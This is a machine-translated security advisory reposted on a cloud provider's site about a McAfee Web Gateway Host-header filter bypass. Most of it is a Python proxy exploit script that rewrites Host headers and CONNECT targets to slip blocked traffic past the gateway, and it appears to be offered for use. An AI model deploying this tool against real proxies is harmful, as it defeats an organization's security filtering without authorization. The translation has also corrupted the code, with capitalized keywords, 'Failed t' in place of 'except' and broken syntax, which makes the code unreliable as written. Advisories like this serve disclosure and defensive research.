McAfee Web Gateway 'host' HTTP header Security Restriction Bypass Vulnerability

Last Update:2014-06-13 Source: Internet

Author: User

Tags squid proxy

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Release date: 2012-04-16
Updated on: 2012-04-17

Affected Systems:
McAfee Web Gateway 7.1.5.2
McAfee Web Gateway 7.1.5.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53015

The McAfee Web Gateway device provides comprehensive security protection for Web 2.0 traffic.

McAfee Web Gateway has a security vulnerability in the implementation of filter rules. Successful attacks allow attackers to bypass certain security restrictions.

<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:

Import socket, struct, sys, time
From threading import Thread

# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy get the Host field of the http header and do not verify anything else.
# It trusts on the HTTP Header and it can be modified by the attacker.

TimeOut = 0.8
IsGet = 0
HostNameG = ""
PacoteGet = ""
Port = 8080 # Listening port
ProxyAddr = "vulnerableProxy.com" # vulnerable proxy
ProxyPort = 8080 # proxy port

Def handle (client, globalSock ):

Client. settimeout (timeOut)

Global hostNameG

While 1:

Dados = ""
Tam = 0
While 1:
Try:
Dados2 = client. recv (1024)
Tam = tam + len (dados2)
Dados = dados + dados2
Failed t socket. timeout:

Break

Dd = dados. find ("CONNECT") # if the packet is a CONNECT METHOD
If dd! =-1:
Dd2 = dados. find (":")
HostName = dados [dd + 8: dd2]

IpAddr = socket. gethostbyname (hostName) # changing the method to connect to the ip address, not the dns domain
Pacote = dados
HostHeader = "Host:" + hostName
Pacote = pacote. replace (hostHeader, "Host: www.uol.com.br") # changing the host field with a value that is accepted by the proxy
Pacote = pacote. replace (hostName, ipAddr) # changind domain for ip

Dados = pacote

Getd = dados. find ("GET ")
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]

If getd! =-1:
GlobalSock. close ()
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)

HostName = dados [getd2 + 2: getd3]

ProxyAuth = ""
ProxyAuthN = dados. find ("Proxy-Authorization :")
If proxyAuthN! =-1:
ProxyAuthNN = dados. find ("\ r \ n", proxyAuthN)
ProxyAuth = dados [proxyAuthN: proxyAuthNN]

IpAddr = socket. gethostbyname (hostName)

Info = "CONNECT" + ipAddr + ": 80 HTTP/1.1 \ r \ n"
If proxyAuthN! =-1:
Info + = proxyAuth + "\ r \ n"

Info + = "Host: www.uol.com.br \ r \ n"

GlobalSock. send (info)
Tam = 0
Gdata = ""

While 1:
Try:

Gdata2 = globalSock. recv (1024)

Tam = tam + len (gdata2)
Gdata = gdata + gdata2

If len (gdata2) = 0:
Break

Failed t socket. timeout:

Break

GlobalSock. send (dados)
Tam = 0
Gdata = ""

While 1:
Try:

Gdata2 = globalSock. recv (1024)

If len (gdata2)> 0:
Client. send (gdata2)

Tam = tam + len (gdata2)
Gdata = gdata + gdata2

If len (gdata2) = 0:
Break

Failed t socket. timeout:

Break

Print 'proxy bypass'
Print 'by Gabriel Menezes Nunes'
Print 'Tested on McAfee Web Gateway 7 and Squid proxy'
Sockzao = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print 'attacked Proxy :',
Print proxyAddr
Print 'listening on ',
Print port
Sockzao. bind ("", port ))

Sockzao. listen (6)

While 1:
Print 'Waiting for ONS ons'
Client, address = sockzao. accept ()
Print 'client connected'
Print address
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)

T = Thread (target = handle, args = (client, globalSock ,))
T. start ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

McAfee
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.mcafee.com/

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More